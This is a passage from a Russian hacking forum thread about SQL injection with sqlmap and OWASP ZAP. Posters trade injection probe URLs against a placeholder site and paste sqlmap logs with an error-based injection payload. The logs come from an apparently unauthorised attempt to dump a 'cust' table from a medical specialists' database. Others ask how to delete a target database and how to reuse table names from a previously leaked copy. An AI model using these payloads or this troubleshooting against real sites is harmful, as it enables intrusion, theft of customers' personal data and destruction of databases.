HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #281  
Старый 20.10.2016, 12:40
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от Metal0l  

Да, честно говоря тоже сетовал на ошибку сканера. Информация различается. У меня выводит сообщение о неопознанной ошибке, и просит обратиться к администратору сайта.
в теории конечно это может быть имя колонки или таблицы( хотя какой то форумный движок, странно было бы иметь такую багу )

http://site.ru/search?search_id=activetopics,version()

http://site.ru/search?search_id=activetopics+where+1=1+--+s

http://site.ru/search?search_id=activetopics+where+1=2+--+s
 
Ответить с цитированием

  #282  
Старый 20.10.2016, 12:43
Metal0l
Новичок
Регистрация: 18.10.2016
Сообщений: 5
С нами: 5036726

Репутация: 0
По умолчанию

Цитата:
Сообщение от t0ma5  

в теории конечно это может быть имя колонки или таблицы( хотя какой то форумный движок, странно было бы иметь такую багу )
http://site.ru/search?search_id=activetopics
,version()
http://site.ru/search?search_id=activetopics
+where+1=1+--+s
http://site.ru/search?search_id=activetopics
+where+1=2+--+s
Возможно, но сам ZAP пишет, что все что идет после слов "activetopic"(в ссылке на скулю) - это способ "Атаки"
 
Ответить с цитированием

  #283  
Старый 20.10.2016, 12:57
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от Metal0l  

Возможно, но сам ZAP пишет, что все что идет после слов "activetopic"(в ссылке на скулю) - это способ "Атаки"
софт много чего пишет, я недавно в винде 8 полез в настройки сети, вылезла ошибка, что то типа того "невозможно открыть настройки подключения из за ошибки компьютера" и кнопка "обновить компьютер", я так аху*л что ребутнулся в линуксы сразу

я это к тому что не надо верить софту на слово
 
Ответить с цитированием

  #284  
Старый 20.10.2016, 13:18
Metal0l
Новичок
Регистрация: 18.10.2016
Сообщений: 5
С нами: 5036726

Репутация: 0
По умолчанию

Цитата:
Сообщение от t0ma5  

софт много чего пишет, я недавно в винде 8 полез в настройки сети, вылезла ошибка, что то типа того "невозможно открыть настройки подключения из за ошибки компьютера" и кнопка "обновить компьютер", я так аху*л что ребутнулся в линуксы сразу
я это к тому что не надо верить софту на слово
Ахах, что ж ну восьмерка есть восьмерка. Большое спасибо за помощь, буду искать дальше.
 
Ответить с цитированием

  #285  
Старый 21.10.2016, 00:01
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами: 5039606

Репутация: 1
По умолчанию

web application technology: Apache

back-end DBMS: MySQL >= 4.1

[22:03:31] [INFO] fetching columns for table 'cust' in database 'medical-special

ists-n'

[22:03:31] [INFO] the SQL query used returns 36 entries

[22:03:31] [DEBUG] suppressing possible resume console info because of large num

ber of rows. It might take too long

[22:03:31] [INFO] starting 10 threads

[22:03:31] [DEBUG] performed 0 queries in 0.23 seconds

[22:03:31] [INFO] fetching entries for table 'cust' in database 'medical-special

ists-n'

[22:03:31] [PAYLOAD] ' OR ROW(9489,9175)>(SELECT COUNT(*),CONCAT(0x716b706271,(S

ELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM `medical-specialists-n`.cust),0x7

176786b71,FLOOR(RAND(0)*2))x FROM (SELECT 2961 UNION SELECT 8568 UNION SELECT 54

10 UNION SELECT 8661)a GROUP BY x)-- NCpp

[22:03:31] [WARNING] the SQL query provided does not return any output

[22:03:31] [WARNING] in case of continuous data retrieval problems you are advis

ed to try a switch '--no-cast' or switch '--hex'

[22:03:31] [WARNING] unable to retrieve the entries for table 'cust' in database

Не могу сдампить пользователей,таблицы показывает,колонки тоже.А вот не дампит(((
 
Ответить с цитированием

  #286  
Старый 23.10.2016, 14:21
masterdolicjakov
Новичок
Регистрация: 17.09.2016
Сообщений: 6
С нами: 5081366

Репутация: 0
По умолчанию

Привет всем!

Ребята, а можно как-то делитнуть базу через SQLmap?
 
Ответить с цитированием

  #287  
Старый 23.10.2016, 15:02
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами: 5039606

Репутация: 1
По умолчанию

Цитата:
Сообщение от masterdolicjakov  

Привет всем!
Ребята, а можно как-то делитнуть базу через SQLmap?
--start=10 --stop=20
 
Ответить с цитированием

  #288  
Старый 24.10.2016, 13:07
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от masterdolicjakov  

Спасибо, попробую.
делитнуть ведь от слова delete? если да, то start/stop тут не причет, это лимиты для запроса

для удаления записей базы у mysql юзера должны быть соответствующие права, + если select и delete в одном запросе всё равно делать нельзя, это если скуль в select
 
Ответить с цитированием

  #289  
Старый 29.10.2016, 04:04
Bobrenz
Новичок
Регистрация: 29.07.2015
Сообщений: 25
С нами: 5680406

Репутация: 0
По умолчанию

всем привет, есть вопрос по мапу, софт получает название базы, но когда дело доходит до названия таблиц и столбцов, начинается брутфорс по словарям, НО вот тут и затык, я знаю название таблиц и столбцов из это базы (сливалась ранее) а теперь просто добавил названия в соответствующие словари мапа, но софт по какой - то причине не хочет есть эти названия и тупо говорит что ничего не нашел, как тут быть?
 
Ответить с цитированием

  #290  
Старый 29.10.2016, 16:06
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от Bobrenz  

всем привет, есть вопрос по мапу, софт получает название базы, но когда дело доходит до названия таблиц и столбцов, начинается брутфорс по словарям, НО вот тут и затык, я знаю название таблиц и столбцов из это базы (сливалась ранее) а теперь просто добавил названия в соответствующие словари мапа, но софт по какой - то причине не хочет есть эти названия и тупо говорит что ничего не нашел, как тут быть?
мануал читать
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.